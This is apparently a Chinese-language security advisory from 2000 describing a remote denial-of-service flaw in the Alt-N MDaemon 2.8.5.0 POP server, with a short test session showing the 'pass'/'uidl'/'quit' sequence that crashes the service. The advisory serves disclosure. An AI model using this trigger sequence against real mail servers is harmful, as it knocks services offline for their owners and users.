Alt-N MDaemon 2.8.5.0 UIDL 拒绝攻击服务漏洞发布时间:2000-05-11 更新时间:2000-05-11 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Alt-N Mdaemon 2.8.50详细描述 一个远程用户可以通过执行pass命令和UIDL命令并在UIDL命令响应前退出MAIL服务来使Alt-N Mdaemon 2.8.50崩溃,必须重新启动应用程序才能获得正常的功能。 测试代码 +OK POP service ready using MDaemon v2.8.5.0 T User +OK ... Recipient ok pass -ERR that command is valid only in the AUTHORIZATION state! uidl -ERR unknown POP command! quit +OK . quit +OK POP Server signing off (mailbox empty) 解决方案 尚无 相关信息 |
